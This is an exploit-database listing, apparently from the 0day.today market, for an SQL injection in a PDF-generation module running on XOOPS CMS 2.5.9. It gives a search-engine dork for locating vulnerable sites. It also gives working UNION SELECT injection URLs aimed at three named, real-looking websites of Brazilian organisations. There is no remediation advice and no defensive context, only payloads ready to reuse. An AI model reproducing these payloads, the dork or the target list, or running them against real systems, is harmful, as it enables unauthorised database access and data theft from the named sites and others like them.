[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

XOOPS CMS 2.5.9 SQL Injection Vulnerability

Author
Felipe Andrian Peixoto
Risk
[
Security Risk High
]
0day-ID
0day-ID-32681
Category
web applications
Date add
14-05-2019
Platform
php
[+] Sql Injection on XOOPS CMS v.2.5.9

[+] Risk: High

[+] CWE Number : CWE-89

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: https://xoops.org/

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Gnu/Linux

[+] Dork: inurl:gerar_pdf.php inurl:modules // use your brain ;)

[+] Exploit : 

        http://host/patch/modules/patch/gerar_pdf.php?cid= [SQL Injection]

[+] PoC : 
 
   https://memoria.fdc.org.br/modules/hemerografico/gerar_pdf.php?cid=4+AND+0+UniOn+SeLeCT+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44

http://acervofams.fundasantos.org.br/modules/cartografico/gerar_pdf.php?cid=373+AND+0+UniOn+SeLeCT+1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50--

http://acervo.apubh.org.br:8080/apubh/modules/bibliografico/gerar_pdf.php?cid=122+AND+0+UniOn+SeLeCT+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41

   
[+] EOF

#  0day.today [2024-12-24]  #